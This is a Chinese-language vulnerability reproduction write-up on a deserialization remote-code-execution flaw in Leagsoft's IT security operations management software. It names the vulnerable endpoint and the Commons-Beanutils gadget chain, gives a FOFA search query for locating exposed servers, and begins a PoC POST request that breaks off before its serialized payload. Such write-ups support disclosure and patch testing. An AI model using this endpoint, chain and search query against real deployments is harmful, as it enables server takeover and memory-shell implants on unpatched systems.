联软 IT 安全运维管理软件反序列化漏洞复现

0x01 产品简介

联软科技持续十多年研发的联软IT安全运维管理软件，集网络准入控制、终端安全管理、BYOD设备管理、杀毒管理、服务器安全管理、数据防泄密、反APT攻击等系统于一体，通过一个平台，统一框架，数据集中，实现更强更智能的安全保护，减轻安全管理负担，降低采购和维护成本。

0x02 漏洞概述

联软IT安全运维管理软件，在 PolicySetDetailController 中 的queryPolicyUseConditionDetail 方法在对输入参数进行处理的过程中进行了反序列化操作，可使用 Commons-Beanutils 反序列化链进行RCE。攻击者可利用该漏洞执行任意代码，在服务器上执行命令、打入内存马等操作，获取服务器权限。

0x03 复现环境

FOFA：app="联软科技-IT安全运维管理系统"

0x04 漏洞复现

PoC

POST /DBAService/PolicySetDetailController/queryPolicyUseConditionDetail HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 7257
Content-Type: application/x-www-form-urlencoded
X